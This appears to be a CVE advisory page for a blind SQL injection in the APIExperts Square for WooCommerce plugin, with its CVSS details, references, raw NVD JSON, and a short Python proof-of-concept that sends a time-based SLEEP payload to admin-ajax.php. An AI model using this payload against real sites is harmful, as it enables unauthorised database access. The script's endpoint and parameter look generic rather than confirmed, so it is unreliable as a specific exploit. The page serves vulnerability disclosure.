CVE-2026-45211

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saad Iqbal APIExperts Square for WooCommerce woosquare allows Blind SQL Injection.This issue affects APIExperts Square for WooCommerce: from n/a through <= 4.7.1.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

APIExperts Square for WooCommerce <= 4.7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-45211
# This script demonstrates a potential Blind SQL Injection scenario
import requests
import time

def check_sqli(url, param, payload):
    data = {param: payload}
    try:
        start = time.time()
        r = requests.post(url, data=data, timeout=10)
        end = time.time()
        # Check for time-based delay indicating true condition
        if end - start > 5:
            return True
        # Or check for specific content differences (Boolean-based)
        return False
    except Exception as e:
        print(f"Error: {e}")
        return False

target = "http://example.com/wp-admin/admin-ajax.php"
vulnerable_param = "order_id"

# Time-based payload example
# If the database pauses for 5 seconds, the vulnerability exists
payload = "1' AND (SELECT SLEEP(5))-- -"

if check_sqli(target, vulnerable_param, payload):
    print("[+] Vulnerability detected!")
else:
    print("[-] Not vulnerable or payload failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45211
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45211
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45211/
[4] VulDB https://vuldb.com/cve/CVE-2026-45211
[5] https://patchstack.com/database/Wordpress/Plugin/woosquare/vulnerability/wordpress-apiexperts-square-for-woocommerce-plugin-4-7-1-sql-injection-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45211", "sourceIdentifier": "[email protected]", "published": "2026-05-12T11:16:20.487", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saad Iqbal APIExperts Square for WooCommerce woosquare allows Blind SQL Injection.This issue affects APIExperts Square for WooCommerce: from n/a through <= 4.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woosquare/vulnerability/wordpress-apiexperts-square-for-woocommerce-plugin-4-7-1-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}